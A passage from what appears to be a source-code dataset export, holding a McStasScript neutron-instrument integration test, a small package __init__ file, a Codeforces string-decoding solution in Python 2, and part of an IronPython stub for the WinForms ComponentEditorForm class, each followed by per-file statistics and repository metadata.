    PSD = Instr.add_component("PSD_1D", "PSDlin_monitor")
    PSD.set_AT([0, 0, 1], RELATIVE="source")
    PSD.xwidth = 0.1
    PSD.nx = 100
    PSD.yheight = 0.03
    PSD.filename = "\"PSD.dat\""
    PSD.restore_neutron = 1

    return Instr
class TestSimpleInstrument(unittest.TestCase):
    """
    Integration test of a full instrument with McStas simulation
    performed by the system. The configuration file needs to be set up
    correctly in order for these tests to succeed.
    """

    @unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
    def test_simple_instrument(self, mock_stdout):
        """
        Test that an instrument can run and that the results match
        expectations. Here the beam lands in a small area in the middle
        of the detector.
        """
        CURRENT_DIR = os.getcwd()
        THIS_DIR = os.path.dirname(os.path.abspath(__file__))
        os.chdir(THIS_DIR)

        Instr = setup_simple_instrument()
        data = Instr.run_full_instrument(foldername="integration_test_simple",
                                         ncount=1E6, mpi=1,
                                         increment_folder_name=True)
        os.chdir(CURRENT_DIR)

        intensity_data = data[0].Intensity
        # beam should be on pixel 35 to 65
        sum_outside_beam = (sum(intensity_data[0:34])
                            + sum(intensity_data[66:99]))
        sum_inside_beam = sum(intensity_data[35:65])

        self.assertTrue(1000 * sum_outside_beam < sum_inside_beam)

    @unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
    def test_simple_instrument_input(self, mock_stdout):
        """
        Test that an instrument can run and that the results match
        expectations. Here the beam lands in a small area in the middle
        of the detector.
        """
        CURRENT_DIR = os.getcwd()
        THIS_DIR = os.path.dirname(os.path.abspath(__file__))
        os.chdir(THIS_DIR)

        Instr = setup_simple_instrument_input_path()
        foldername = "integration_test_simple_input"
        data = Instr.run_full_instrument(foldername=foldername,
                                         ncount=1E6, mpi=1,
                                         increment_folder_name=True)
        os.chdir(CURRENT_DIR)

        intensity_data = data[0].Intensity
        # beam should be on pixel 35 to 65
        sum_outside_beam = (sum(intensity_data[0:34])
                            + sum(intensity_data[66:99]))
        sum_inside_beam = sum(intensity_data[35:65])

        self.assertTrue(1000 * sum_outside_beam < sum_inside_beam)

        # Check component from input_folder read
        self.assertEqual(data[0].metadata.xlabel, "Test")

    @unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
    def test_simple_instrument_mpi(self, mock_stdout):
        """
        Test that an instrument can run and that the results match
        expectations. Here the beam lands in a small area in the middle
        of the detector. Running with mpi, 2 cores.
        """
        CURRENT_DIR = os.getcwd()
        THIS_DIR = os.path.dirname(os.path.abspath(__file__))
        os.chdir(THIS_DIR)

        Instr = setup_simple_instrument()
        data = Instr.run_full_instrument(foldername="integration_test_mpi",
                                         ncount=1E6, mpi=2,
                                         increment_folder_name=True)
        os.chdir(CURRENT_DIR)

        intensity_data = data[0].Intensity
        # beam should be on pixel 35 to 65
        sum_outside_beam = (sum(intensity_data[0:34])
                            + sum(intensity_data[66:99]))
        sum_inside_beam = sum(intensity_data[35:65])

        self.assertTrue(1000 * sum_outside_beam < sum_inside_beam)

    @unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
    def test_slit_instrument(self, mock_stdout):
        """
        Test parameters can be controlled through McStasScript. Here
        a slit can be moved, but the default value of 0 should be
        used.
        """
        CURRENT_DIR = os.getcwd()
        THIS_DIR = os.path.dirname(os.path.abspath(__file__))
        os.chdir(THIS_DIR)

        Instr = setup_simple_slit_instrument()
        foldername = "integration_test_slit"
        data = Instr.run_full_instrument(foldername=foldername,
                                         ncount=2E6, mpi=2,
                                         increment_folder_name=True)
        os.chdir(CURRENT_DIR)

        intensity_data = data[0].Intensity
        # beam should be on pixel 45 to 55
        sum_outside_beam = (sum(intensity_data[0:44])
                            + sum(intensity_data[56:99]))
        sum_inside_beam = sum(intensity_data[45:55])

        self.assertTrue(1000 * sum_outside_beam < sum_inside_beam)

    @unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
    def test_slit_moved_instrument(self, mock_stdout):
        """
        Test parameters can be controlled through McStasScript. Here
        a slit is moved to one side and the result is verified.
        """
        CURRENT_DIR = os.getcwd()
        THIS_DIR = os.path.dirname(os.path.abspath(__file__))
        os.chdir(THIS_DIR)

        Instr = setup_simple_slit_instrument()
        data = Instr.run_full_instrument(foldername="integration_test_slit",
                                         ncount=2E6, mpi=2,
                                         increment_folder_name=True,
                                         parameters={"slit_offset": 0.03})
        os.chdir(CURRENT_DIR)

        intensity_data = data[0].Intensity
        # beam should be on pixel 75 to 85
        sum_outside_beam = (sum(intensity_data[0:74])
                            + sum(intensity_data[86:99]))
        sum_inside_beam = sum(intensity_data[75:85])

        self.assertTrue(1000 * sum_outside_beam < sum_inside_beam)


if __name__ == '__main__':
    unittest.main()
| 31.922764 | 78 | 0.615179 | 1,011 | 7,853 | 4.541048 | 0.162216 | 0.056633 | 0.052276 | 0.037029 | 0.826835 | 0.80941 | 0.80941 | 0.773252 | 0.743411 | 0.714441 | 0 | 0.041942 | 0.286515 | 7,853 | 245 | 79 | 32.053061 | 0.777441 | 0.131924 | 0 | 0.72973 | 0 | 0 | 0.067263 | 0.025602 | 0 | 0 | 0 | 0 | 0.040541 | 1 | 0.054054 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
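Each test above applies the same acceptance criterion: virtually all recorded intensity must land inside an expected pixel window. That check factors out to a small helper (a sketch with an illustrative name; the 1000:1 ratio mirrors the assertions above):

```python
def beam_confined(intensity, lo, hi, ratio=1000):
    # True when the intensity inside pixels [lo, hi] dominates the
    # intensity everywhere else by at least the given ratio.
    inside = sum(intensity[lo:hi + 1])
    outside = sum(intensity) - inside
    return ratio * outside < inside
```

Using a ratio rather than demanding exactly zero outside intensity keeps the tests robust to Monte Carlo noise in the simulated detector signal.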
bc1222c88e1cfab97e44da926e07eed4330369b4 | 284 | py | Python | explicalib/calibration/evaluation/plots/binary/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | 2 | 2021-11-30T18:44:11.000Z | 2021-11-30T18:44:19.000Z | explicalib/calibration/evaluation/plots/binary/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | null | null | null | explicalib/calibration/evaluation/plots/binary/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@author: nicolas.posocco
"""
from .binary_reliability import plot_binary_reliability_diagram
from .binary_reliability_curve import plot_binary_reliability_curve
from .bootstrapped_binary_reliability_curve import plot_bootstrapped_binary_reliability_curve | 31.555556 | 93 | 0.848592 | 34 | 284 | 6.617647 | 0.411765 | 0.453333 | 0.391111 | 0.24 | 0.284444 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003817 | 0.077465 | 284 | 9 | 93 | 31.555556 | 0.854962 | 0.165493 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bc342136c87b638cd9692a1e4da4b2e968502aa8 | 1,177 | py | Python | codeforces/746B.py | italo-batista/problems-solving | f83ad34f0abebd52925c4020635556f20743ba06 | [
"MIT"
] | null | null | null | codeforces/746B.py | italo-batista/problems-solving | f83ad34f0abebd52925c4020635556f20743ba06 | [
"MIT"
] | null | null | null | codeforces/746B.py | italo-batista/problems-solving | f83ad34f0abebd52925c4020635556f20743ba06 | [
"MIT"
] | null | null | null | tam = int(raw_input())
encode = str(raw_input())

word = [""] * tam
letters = tam

if tam % 2 == 0:
    mid = tam / 2 - 1
else:
    mid = tam / 2

i = mid
curr = 0

if tam % 2 != 0:
    while letters > 0:
        if curr < tam:
            if curr == 0:
                word[mid] = encode[curr]
                curr = curr + 1
            elif curr % 2 != 0:
                i = mid - (i - mid) - 1
                word[i] = encode[curr]
                curr = curr + 1
            else:
                i = mid + (mid - i)
                word[i] = encode[curr]
                curr = curr + 1
            letters = letters - 1
        else:
            break
else:
    while letters > 0:
        if curr < tam:
            if curr == 0:
                word[mid] = encode[curr]
                curr = curr + 1
            elif curr % 2 != 0:
                i = mid + (mid - i) + 1
                word[i] = encode[curr]
                curr = curr + 1
            else:
                i = mid - (i - mid)
                word[i] = encode[curr]
                curr = curr + 1
            letters = letters - 1
        else:
            break
print "".join(word) | 18.983871 | 40 | 0.361088 | 134 | 1,177 | 3.156716 | 0.156716 | 0.22695 | 0.198582 | 0.255319 | 0.70922 | 0.70922 | 0.70922 | 0.70922 | 0.70922 | 0.70922 | 0 | 0.046595 | 0.525913 | 1,177 | 62 | 41 | 18.983871 | 0.71147 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.022222 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
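The index arithmetic above can be re-derived compactly: reading the encoded string from its first character, each character extends the decoded word outward from the middle, alternating sides, and which side comes first flips with the parity of the length. A Python 3 sketch of that equivalent formulation:

```python
from collections import deque

def decode(encoded):
    # Rebuild the original word from its "median letter" encoding by
    # growing a deque outward from the middle character.
    n = len(encoded)
    word = deque()
    for j, c in enumerate(encoded):
        if j % 2 == n % 2:
            word.appendleft(c)
        else:
            word.append(c)
    return "".join(word)
```

The deque replaces the explicit mirrored-index bookkeeping (`mid - (i - mid) - 1` and friends) with two O(1) end operations per character.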
70ae87be832c214bd2d1f7ce6e04028ada20639c | 162,484 | py | Python | release/stubs/System/Windows/Forms/Design.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 182 | 2017-06-27T02:26:15.000Z | 2022-03-30T18:53:43.000Z | release/stubs/System/Windows/Forms/Design.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 28 | 2017-06-27T13:38:23.000Z | 2022-03-15T11:19:44.000Z | release/stubs/System/Windows/Forms/Design.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 67 | 2017-06-28T09:43:59.000Z | 2022-03-20T21:17:10.000Z | # encoding: utf-8
# module System.Windows.Forms.Design calls itself Design
# from System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class ComponentEditorForm(Form, IComponent, IDisposable, IOleControl, IOleObject, IOleInPlaceObject, IOleInPlaceActiveObject, IOleWindow, IViewObject, IViewObject2, IPersist, IPersistStreamInit, IPersistPropertyBag, IPersistStorage, IQuickActivate, ISupportOleDropSource, IDropTarget, ISynchronizeInvoke, IWin32Window, IArrangedElement, IBindableComponent, IContainerControl):
"""
Provides a user interface for a System.Windows.Forms.Design.WindowsFormsComponentEditor.
ComponentEditorForm(component: object, pageTypes: Array[Type])
"""
def AccessibilityNotifyClients(self, *args): #cannot find CLR method
"""
AccessibilityNotifyClients(self: Control, accEvent: AccessibleEvents, objectID: int, childID: int)
Notifies the accessibility client applications of the specified
System.Windows.Forms.AccessibleEvents for the specified child control .
accEvent: The System.Windows.Forms.AccessibleEvents to notify the accessibility client applications of.
objectID: The identifier of the System.Windows.Forms.AccessibleObject.
childID: The child System.Windows.Forms.Control to notify of the accessible event.
AccessibilityNotifyClients(self: Control, accEvent: AccessibleEvents, childID: int)
Notifies the accessibility client applications of the specified
System.Windows.Forms.AccessibleEvents for the specified child control.
accEvent: The System.Windows.Forms.AccessibleEvents to notify the accessibility client applications of.
childID: The child System.Windows.Forms.Control to notify of the accessible event.
"""
pass
def ActivateMdiChild(self, *args): #cannot find CLR method
"""
ActivateMdiChild(self: Form, form: Form)
Activates the MDI child of a form.
form: The child form to activate.
"""
pass
def AdjustFormScrollbars(self, *args): #cannot find CLR method
"""
AdjustFormScrollbars(self: Form, displayScrollbars: bool)
Adjusts the scroll bars on the container based on the current control positions and the control
currently selected.
displayScrollbars: true to show the scroll bars; otherwise, false.
"""
pass
def ApplyAutoScaling(self, *args): #cannot find CLR method
"""
ApplyAutoScaling(self: Form)
Resizes the form according to the current value of the
System.Windows.Forms.Form.AutoScaleBaseSize property and the size of the current font.
"""
pass
def CenterToParent(self, *args): #cannot find CLR method
"""
CenterToParent(self: Form)
Centers the position of the form within the bounds of the parent form.
"""
pass
def CenterToScreen(self, *args): #cannot find CLR method
"""
CenterToScreen(self: Form)
Centers the form on the current screen.
"""
pass
def CreateAccessibilityInstance(self, *args): #cannot find CLR method
"""
CreateAccessibilityInstance(self: Control) -> AccessibleObject
Creates a new accessibility object for the control.
Returns: A new System.Windows.Forms.AccessibleObject for the control.
"""
pass
def CreateControlsInstance(self, *args): #cannot find CLR method
"""
CreateControlsInstance(self: Form) -> ControlCollection
Returns: A new instance of System.Windows.Forms.Control.ControlCollection assigned to the control.
"""
pass
def CreateHandle(self, *args): #cannot find CLR method
"""
CreateHandle(self: Form)
Creates the handle for the form. If a derived class overrides this function, it must call the
base implementation.
"""
pass
def DefWndProc(self, *args): #cannot find CLR method
"""
DefWndProc(self: Form, m: Message) -> Message
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def DestroyHandle(self, *args): #cannot find CLR method
"""
DestroyHandle(self: Control)
Destroys the handle associated with the control.
"""
pass
def Dispose(self):
"""
Dispose(self: Form, disposing: bool)
Disposes of the resources (other than memory) used by the System.Windows.Forms.Form.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def GetAccessibilityObjectById(self, *args): #cannot find CLR method
"""
GetAccessibilityObjectById(self: Control, objectId: int) -> AccessibleObject
Retrieves the specified System.Windows.Forms.AccessibleObject.
objectId: An Int32 that identifies the System.Windows.Forms.AccessibleObject to retrieve.
Returns: An System.Windows.Forms.AccessibleObject.
"""
pass
def GetAutoSizeMode(self, *args): #cannot find CLR method
"""
GetAutoSizeMode(self: Control) -> AutoSizeMode
Retrieves a value indicating how a control will behave when its
System.Windows.Forms.Control.AutoSize property is enabled.
Returns: One of the System.Windows.Forms.AutoSizeMode values.
"""
pass
def GetScaledBounds(self, *args): #cannot find CLR method
"""
GetScaledBounds(self: Form, bounds: Rectangle, factor: SizeF, specified: BoundsSpecified) -> Rectangle
bounds: A System.Drawing.Rectangle that specifies the area for which to retrieve the display bounds.
factor: The height and width of the control's bounds.
specified: One of the values of System.Windows.Forms.BoundsSpecified that specifies the bounds of the
control to use when defining its size and position.
Returns: A System.Drawing.Rectangle representing the bounds within which the control is scaled.
"""
pass
def GetScrollState(self, *args): #cannot find CLR method
"""
GetScrollState(self: ScrollableControl, bit: int) -> bool
Determines whether the specified flag has been set.
bit: The flag to check.
Returns: true if the specified flag has been set; otherwise, false.
"""
pass
def GetService(self, *args): #cannot find CLR method
"""
GetService(self: Component, service: Type) -> object
Returns an object that represents a service provided by the System.ComponentModel.Component or
by its System.ComponentModel.Container.
service: A service provided by the System.ComponentModel.Component.
Returns: An System.Object that represents a service provided by the System.ComponentModel.Component, or
null if the System.ComponentModel.Component does not provide the specified service.
"""
pass
def GetStyle(self, *args): #cannot find CLR method
"""
GetStyle(self: Control, flag: ControlStyles) -> bool
Retrieves the value of the specified control style bit for the control.
flag: The System.Windows.Forms.ControlStyles bit to return the value from.
Returns: true if the specified control style bit is set to true; otherwise, false.
"""
pass
def GetTopLevel(self, *args): #cannot find CLR method
"""
GetTopLevel(self: Control) -> bool
Determines if the control is a top-level control.
Returns: true if the control is a top-level control; otherwise, false.
"""
pass
def InitLayout(self, *args): #cannot find CLR method
"""
InitLayout(self: Control)
Called after the control has been added to another container.
"""
pass
def InvokeGotFocus(self, *args): #cannot find CLR method
"""
InvokeGotFocus(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.GotFocus event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokeLostFocus(self, *args): #cannot find CLR method
"""
InvokeLostFocus(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LostFocus event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokeOnClick(self, *args): #cannot find CLR method
"""
InvokeOnClick(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Click event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Click event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokePaint(self, *args): #cannot find CLR method
"""
InvokePaint(self: Control, c: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event for the specified control.
c: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Paint event to.
e: An System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def InvokePaintBackground(self, *args): #cannot find CLR method
"""
InvokePaintBackground(self: Control, c: Control, e: PaintEventArgs)
Raises the PaintBackground event for the specified control.
c: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Paint event to.
e: An System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def IsInputChar(self, *args): #cannot find CLR method
"""
IsInputChar(self: Control, charCode: Char) -> bool
Determines if a character is an input character that the control recognizes.
charCode: The character to test.
Returns: true if the character should be sent directly to the control and not preprocessed; otherwise,
false.
"""
pass
def IsInputKey(self, *args): #cannot find CLR method
"""
IsInputKey(self: Control, keyData: Keys) -> bool
Determines whether the specified key is a regular input key or a special key that requires
preprocessing.
keyData: One of the System.Windows.Forms.Keys values.
Returns: true if the specified key is a regular input key; otherwise, false.
"""
pass
def MemberwiseClone(self, *args): #cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone, which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
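MemberwiseClone performs a shallow copy: field values are duplicated, but reference-type fields in the clone still point at the same objects as the original. The closest Python analogue is `copy.copy`; a small sketch of the shared-reference consequence:

```python
import copy

class Node:
    def __init__(self, tag, children):
        self.tag = tag
        self.children = children  # reference-type field

original = Node("root", ["a", "b"])
clone = copy.copy(original)    # shallow copy, like MemberwiseClone

clone.tag = "clone"            # rebinding affects the clone only
clone.children.append("c")     # the list is shared: visible through both objects
```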
def NotifyInvalidate(self, *args): #cannot find CLR method
"""
NotifyInvalidate(self: Control, invalidatedArea: Rectangle)
Raises the System.Windows.Forms.Control.Invalidated event with a specified region of the control
to invalidate.
invalidatedArea: A System.Drawing.Rectangle representing the area to invalidate.
"""
pass
def OnActivated(self, *args): #cannot find CLR method
"""
OnActivated(self: ComponentEditorForm, e: EventArgs)
Raises the System.Windows.Forms.Form.Activated event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnAutoSizeChanged(self, *args): #cannot find CLR method
"""
OnAutoSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.AutoSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnAutoValidateChanged(self, *args): #cannot find CLR method
"""
OnAutoValidateChanged(self: ContainerControl, e: EventArgs)
Raises the System.Windows.Forms.ContainerControl.AutoValidateChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackColorChanged(self, *args): #cannot find CLR method
"""
OnBackColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackgroundImageChanged(self, *args): #cannot find CLR method
"""
OnBackgroundImageChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackgroundImageLayoutChanged(self, *args): #cannot find CLR method
"""
OnBackgroundImageLayoutChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageLayoutChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBindingContextChanged(self, *args): #cannot find CLR method
"""
OnBindingContextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BindingContextChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnCausesValidationChanged(self, *args): #cannot find CLR method
"""
OnCausesValidationChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CausesValidationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnChangeUICues(self, *args): #cannot find CLR method
"""
OnChangeUICues(self: Control, e: UICuesEventArgs)
Raises the System.Windows.Forms.Control.ChangeUICues event.
e: A System.Windows.Forms.UICuesEventArgs that contains the event data.
"""
pass
def OnClick(self, *args): #cannot find CLR method
"""
OnClick(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Click event.
e: An System.EventArgs that contains the event data.
"""
pass
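The many On* methods listed here follow one convention: each protected `OnX` method is the single place event X is raised, by invoking its subscribed handlers, so a subclass that overrides `OnX` without calling the base implementation suppresses the event. A plain-Python sketch of that dispatch pattern (not WinForms itself):

```python
class ControlSketch:
    def __init__(self):
        self.click_handlers = []   # the Click event's subscriber list

    def OnClick(self, e):
        # Raising the event means calling every subscribed handler.
        for handler in self.click_handlers:
            handler(self, e)

class SilentControl(ControlSketch):
    def OnClick(self, e):
        pass  # overriding without calling super().OnClick(e) suppresses Click

fired = []
c = ControlSketch()
c.click_handlers.append(lambda sender, e: fired.append(e))
c.OnClick("click-event-args")
```

This is why the WinForms documentation tells overriders to call the base class's On* method: forgetting to do so silently disconnects every external subscriber.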
def OnClientSizeChanged(self, *args): #cannot find CLR method
"""
OnClientSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ClientSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnClosed(self, *args): #cannot find CLR method
"""
OnClosed(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.Closed event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnClosing(self, *args): #cannot find CLR method
"""
OnClosing(self: Form, e: CancelEventArgs)
Raises the System.Windows.Forms.Form.Closing event.
e: A System.ComponentModel.CancelEventArgs that contains the event data.
"""
pass
def OnContextMenuChanged(self, *args): #cannot find CLR method
"""
OnContextMenuChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ContextMenuChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnContextMenuStripChanged(self, *args): #cannot find CLR method
"""
OnContextMenuStripChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ContextMenuStripChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnControlAdded(self, *args): #cannot find CLR method
"""
OnControlAdded(self: Control, e: ControlEventArgs)
Raises the System.Windows.Forms.Control.ControlAdded event.
e: A System.Windows.Forms.ControlEventArgs that contains the event data.
"""
pass
def OnControlRemoved(self, *args): #cannot find CLR method
"""
OnControlRemoved(self: Control, e: ControlEventArgs)
Raises the System.Windows.Forms.Control.ControlRemoved event.
e: A System.Windows.Forms.ControlEventArgs that contains the event data.
"""
pass
def OnCreateControl(self, *args): #cannot find CLR method
"""
OnCreateControl(self: Form)
Raises the CreateControl event.
"""
pass
def OnCursorChanged(self, *args): #cannot find CLR method
"""
OnCursorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CursorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDeactivate(self, *args): #cannot find CLR method
"""
OnDeactivate(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.Deactivate event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnDockChanged(self, *args): #cannot find CLR method
"""
OnDockChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DockChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDoubleClick(self, *args): #cannot find CLR method
"""
OnDoubleClick(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DoubleClick event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDpiChanged(self, *args): #cannot find CLR method
""" OnDpiChanged(self: Form, e: DpiChangedEventArgs) """
pass
def OnDpiChangedAfterParent(self, *args): #cannot find CLR method
""" OnDpiChangedAfterParent(self: Control, e: EventArgs) """
pass
def OnDpiChangedBeforeParent(self, *args): #cannot find CLR method
""" OnDpiChangedBeforeParent(self: Control, e: EventArgs) """
pass
def OnDragDrop(self, *args): #cannot find CLR method
"""
OnDragDrop(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragDrop event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragEnter(self, *args): #cannot find CLR method
"""
OnDragEnter(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragEnter event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragLeave(self, *args): #cannot find CLR method
"""
OnDragLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DragLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDragOver(self, *args): #cannot find CLR method
"""
OnDragOver(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragOver event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnEnabledChanged(self, *args): #cannot find CLR method
"""
OnEnabledChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.EnabledChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnEnter(self, *args): #cannot find CLR method
"""
OnEnter(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.Enter event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnFontChanged(self, *args): #cannot find CLR method
"""
OnFontChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnForeColorChanged(self, *args): #cannot find CLR method
"""
OnForeColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ForeColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnFormClosed(self, *args): #cannot find CLR method
"""
OnFormClosed(self: Form, e: FormClosedEventArgs)
Raises the System.Windows.Forms.Form.FormClosed event.
e: A System.Windows.Forms.FormClosedEventArgs that contains the event data.
"""
pass
def OnFormClosing(self, *args): #cannot find CLR method
"""
OnFormClosing(self: Form, e: FormClosingEventArgs)
Raises the System.Windows.Forms.Form.FormClosing event.
e: A System.Windows.Forms.FormClosingEventArgs that contains the event data.
"""
pass
def OnGetDpiScaledSize(self, *args): #cannot find CLR method
""" OnGetDpiScaledSize(self: Form, deviceDpiOld: int, deviceDpiNew: int, desiredSize: Size) -> (bool, Size) """
pass
def OnGiveFeedback(self, *args): #cannot find CLR method
"""
OnGiveFeedback(self: Control, gfbevent: GiveFeedbackEventArgs)
Raises the System.Windows.Forms.Control.GiveFeedback event.
gfbevent: A System.Windows.Forms.GiveFeedbackEventArgs that contains the event data.
"""
pass
def OnGotFocus(self, *args): #cannot find CLR method
"""
OnGotFocus(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.GotFocus event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnHandleCreated(self, *args): #cannot find CLR method
"""
OnHandleCreated(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.HandleCreated event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnHandleDestroyed(self, *args): #cannot find CLR method
"""
OnHandleDestroyed(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.HandleDestroyed event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnHelpButtonClicked(self, *args): #cannot find CLR method
"""
OnHelpButtonClicked(self: Form, e: CancelEventArgs)
Raises the System.Windows.Forms.Form.HelpButtonClicked event.
e: A System.ComponentModel.CancelEventArgs that contains the event data.
"""
pass
def OnHelpRequested(self, *args): #cannot find CLR method
"""
OnHelpRequested(self: ComponentEditorForm, e: HelpEventArgs)
Raises the System.Windows.Forms.Control.HelpRequested event.
e: A System.Windows.Forms.HelpEventArgs that contains the event data.
"""
pass
def OnImeModeChanged(self, *args): #cannot find CLR method
"""
OnImeModeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ImeModeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnInputLanguageChanged(self, *args): #cannot find CLR method
"""
OnInputLanguageChanged(self: Form, e: InputLanguageChangedEventArgs)
Raises the System.Windows.Forms.Form.InputLanguageChanged event.
e: The System.Windows.Forms.InputLanguageChangedEventArgs that contains the event data.
"""
pass
def OnInputLanguageChanging(self, *args): #cannot find CLR method
"""
